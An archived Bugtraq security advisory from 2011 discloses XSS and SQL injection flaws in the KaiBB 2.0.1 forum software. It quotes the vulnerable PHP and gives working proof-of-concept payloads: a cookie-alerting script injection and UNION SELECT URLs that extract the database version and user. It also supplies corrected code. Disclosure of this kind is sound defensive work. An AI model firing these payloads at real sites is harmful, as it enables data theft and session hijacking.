lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201110091057.p99Av38u011925@sf01web1.securityfocus.com>
Date: Sun, 9 Oct 2011 10:57:03 GMT
From: sschurtz@...nline.de
To: bugtraq@...urityfocus.com
Subject: KaiBB 2.0.1 XSS and SQL Injection vulnerabilities

Advisory:              	KaiBB 2.0.1 XSS and SQL Injection vulnerabilities
Advisory ID:           	SSCHADV2011-027
Author:                	Stefan Schurtz
Affected Software:  	Successfully tested on KaiBB 2.0.1
Vendor URL:          	http://code.google.com/p/kaibb/
Vendor Status:       	informed
CVE-ID:                	-

==========================
Vulnerability Description
==========================

KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities

==================
Technical Details
==================

# sql injection vul code in 'kaibb/rss.php' 

if ( isset($_GET['forum']))
    {
       $id = $secure->clean($_GET['forum']);
       $doGet = $db->query("SELECT * FROM " . $prefix . "_topics WHERE forum_id = '".$_GET['forum']."' ORDER BY id DESC LIMIT 15");
    } else {
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics ORDER BY id DESC LIMIT 15");
}

# inc/function.php

class secure {

function clean($content) {
        $content = mysql_real_escape_string(htmlspecialchars($content));
        return $content;
}

# xss vul code in 'inc/header.php'

$session_location = $_SERVER['REQUEST_URI'];

==================
Exploit
==================

Cross-site Scripting

http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>

SQL Injection

http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a

=========
Solution
=========

# solution for the sql injection

    if ( isset($_GET['forum']))
    {
       $id = $secure->clean($_GET['forum']);
       //$doGet = $db->query("SELECT * FROM " . $prefix . "_topics WHERE forum_id = '".$_GET['forum']."' ORDER BY id DESC LIMIT 15");
       $doGet = $db->query("SELECT * FROM " . $prefix . "_topics WHERE forum_id = '". $id ."' ORDER BY id DESC LIMIT 15");
    } else {
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics ORDER BY id DESC LIMIT 15");
}

# solution for the xss vulnerability

//$session_location = $_SERVER['REQUEST_URI'];
$session_location = $_SERVER['SCRIPT_NAME'];

or

$session_location = htmlspecialchars($_SERVER['REQUEST_URI'],ENT_QUOTES);

====================
Disclosure Timeline
====================

08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory
09-Oct-2011 - Post on BugTraq

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://code.google.com/p/kaibb/
http://code.google.com/p/kaibb/issues/detail?id=2
http://www.rul3z.de/advisories/SSCHADV2011-027.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ